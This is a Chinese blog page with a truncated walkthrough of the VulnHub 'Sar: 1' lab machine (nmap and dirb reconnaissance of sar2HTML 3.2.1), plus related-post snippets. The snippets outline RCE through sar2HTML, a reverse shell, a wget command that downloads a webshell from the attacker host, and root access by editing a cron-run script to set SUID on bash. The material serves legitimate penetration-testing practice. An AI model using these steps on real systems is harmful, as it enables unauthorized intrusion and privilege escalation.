vulnhub Sar: 1

最新推荐文章于 2025-02-05 10:44:06 发布
最新推荐文章于 2025-02-05 10:44:06 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: vulnhub 文章标签: base64反弹shell exploit-db 定时任务 RCE linpeas
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/elephantxiang/article/details/124570970
版权

渗透思路:

nmap扫描----dirb扫描网站目录----exploit-db查找exp----利用sar2html的RCE漏洞getshell(base64编码)----利用定时任务提权

环境信息:

靶机:192.168.101.65

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.65

只扫描到80端口(http)

2、dirb扫描网站目录

​dirb http://192.168.101.65

查看http://192.168.101.65/robots.txt,发现sar2HTML

3、exploit-db查找exp

访问http://192.168.101.65/sar2HTML/,发现版本信息:sar2html Ver 3.2.1

最低0.47元/天 解锁文章
vulhub 学习下载
战神/calmness的博客
12-24 898
New Boxes (March 2020): DC 9: https://www.vulnhub.com/entry/dc-9,412/ Digitalworld.local (Bravery): https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Digitalworld.local (Development): https://www.vulnhub.com/entry/digitalworldlocal-develop
vulnhub:Sar
cjstang的博客
06-16 852
OSCP-2:这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。 主要利用方式:sar2HTML命令执行反弹shell(可php文件上传反弹shell)+定时脚本提权......
Vulnhub-靶机-Sar 1
qq_43264813的博客
01-27 1393
Vulnhub—靶机—Sar 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/sar-1,425/ 文章目录Vulnhub—靶机—Sar 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -s
vulhub-sar
2201_75378806的博客
04-16 607
这台靶机的知识点主要有sarhtml命令执行漏洞和定时任务提权开始渗透常规nmap扫描靶机ip 192.168.110.131,开放端口80。
vulnhub sar 靶场练习
鸥鹭忘机
09-07 2446
前言 这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。如果看过我前面vulnhub DC系列的文章,那么这次靶机可以独立自主完成。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击sar靶机,然后选中配置。依次点击网络配置->NAT模式->高
vulnhub靶机2(easy难度):sar(远程代码执行,计划任务提权)
anddddoooo的博客
09-08 713
那么http://192.168.18.1/sar2HTML/index.php?网上找一个webshell,这里我找的php的webshell,文件命名为shell.php,记得将webshell的ip和port配置为攻击机器。请求http://192.168.18.1/sar2HTML/index.php?目标机器:wget http://192.168.18.47:8000/shell.php。需要输入url:http://192.168.18.1/sar2HTML/
vulnhub sar
09-09
vulnhub sar是一个类似OSCP的虚拟机,它旨在帮助用户提高和巩固渗透测试的知识点。如果你想下载sar靶机,你可以在GitHub上找到它,具体来说,你可以在pentestmonkey的php-reverse-shell存储库中找到它。如果你已经...
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3443
每台都做一做,然后记录在博客里.供自己和大家一起学习.
Orasi: 1 vulnhub walkthrough
xdeclearn的博客
03-11 1556
下载地址:http://www.vulnhub.com/entry/orasi-1,660/ Hint :just one useless little dot 0x01 信息收集到获取shell 端口扫描: 使用anonymous访问ftp,获取到一个文件:url。该文件为一个共享连接库。先看看main函数: 于是将insert中的每一个字符转换为acsii码,得到一串字符/sh4d0w$s,看起来像是url。 访问80端口,得到一串奇怪的字符,看着有点像口令字典工具crunch的参数,等一下还有用。
vulnhub靶场——CORROSION:1
Czheisenberg的博客
02-16 2174
准备 攻击机:kali 靶机: CORROSION: 1 NAT 192.168.91.0 网段 下载连接: https://www.vulnhub.com/entry/corrosion-1,730/ 信息搜集与利用 主机发现 python3 ping.py -H 192.168.91.0/24 如图所示得到目标靶机IP地址: 192.168.91.188 端口扫描 如图所示只开放了 22,80 两个端口。 HTTP http://192.168.91.188/ 目录扫描 挨个访问上面的路径:
sar2html-开源
05-25
Sar2html是基于Web的性能监视前端。 它将sar二进制数据转换为图形格式,并将历史数据保留在其数据库中。 项目主页在这里:https://github.com/cemtan/sar2html.git支持的操作系统:HPUX 11.1111.23、11.31 Solaris 5.9、5.10、5.11 Redhat 3、4、5、6、7 Suse 8、9 ,10,1112 Ubuntu 18,20如果您的客户在上述操作系统上遇到性能问题,则可以发送sar2ascii来收集性能数据。 然后,您可以绘制性能图形,并通过sar2html以pdf文件格式生成性能报告。 请记住,捐赠鼓励开发人员实施更多。
Vulnhub_Sar2Html Ver 3.2.1靶机渗透测试
m0_66225311的博客
09-18 310
依旧是使用nmap进行信息收集,只开放80端口,就需要在网站上寻找突破点了本次靶机web网站使用的是一个sar2html工具,该版本存在远程命令执行漏洞可以利用善于进行搜索,发现可疑的名称版本信息去寻找是否有相应的漏洞能进行命令执行,那就可以选择直接执行反弹shell的命令,不成功就选择wget下载反弹shell的脚本文件本次靶机提权使用到的是定时任务进行提权,提权方式相对简单,只要找到对应的定时任务脚本查看里面内容即可。
实战打靶集锦-012-sar2HTML
阿尔泰野狼的博客
03-19 630
本文记录博主的一次打靶经历。
靶场练习(2):sar2HTML
Dcy1124的博客
09-10 487
仅提供最直接的有效打靶过程,无效的环节就跳过了。
靶机渗透之sar
weixin_64267091的博客
02-28 1233
靶机渗透过程也就分为那几步骤,首先就是信息收集,找ip,端口,目录,漏洞。然后就进行漏洞分析,在进行漏洞分析的时候使用到了kali中自带的工具searchsploit,使用它搜索sar2HTML存在的漏洞,然后将漏洞利用脚本拷贝到本地,最后得知漏洞利用方式。最后就利用远程代码执行漏洞,上传反弹shell脚本,上传脚本一直出问题,也不知道为啥,最后上传了个shell.py,反弹成功。然后就是最后提权部分,利用了计划任务提权,获取root权限的关键是finally.sh脚本以root用户的权限来执行。
【学渗透靶机——sar 1
jieli0901227的博客
06-20 736
主机漏洞扫描完成,这台靶机只开放了80 端口,通过nmap l漏洞扫描发现有robots.txt 和phpinfo.php 两个文件。切换到目录、var/www/html下 查看finally.sh ,这个脚本调用了write.sh ,robots 这个文件是方式爬虫爬取网站的,那么这个字符串有可能就是路径了,访问看看,80 端口默认页是一个apache服务的默认页面,没有什么特殊的地方。1、首先靶机主机ip发现, 端口扫描(),nmap 漏洞探测。那就好办了,,尝试利用下,镜像下来,打开看看。
Linux 从 sarsar2html 的认识
记录创业路上的一些想法
07-24 2768
Linux sar
靶机练习之sar
qq_52360932的博客
04-01 4691
靶机练习之sar,学习笔记
OSCP - Proving Grounds - sar2HTML
最新发布
柴郡猫^O^
02-05 469
这个finally.sh比较可疑,查看一下,看起来这个finally.sh会调用write.sh,而我们对于write.sh有写权限。枚举一下路径,发现有phpinfo和robots.txt,而robots.txt里有sar2HTML路径。sudo -l和suid都没有什么有用的信息,上传Linpeas.sh并执行,得到。尝试访问一下sar2HTML,得知是3.2.1版本,搜索一下得知其有RCE漏洞。修改write.sh,让其赋予/bin/bash SUID。nmap扫描,只开了一个80端口。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值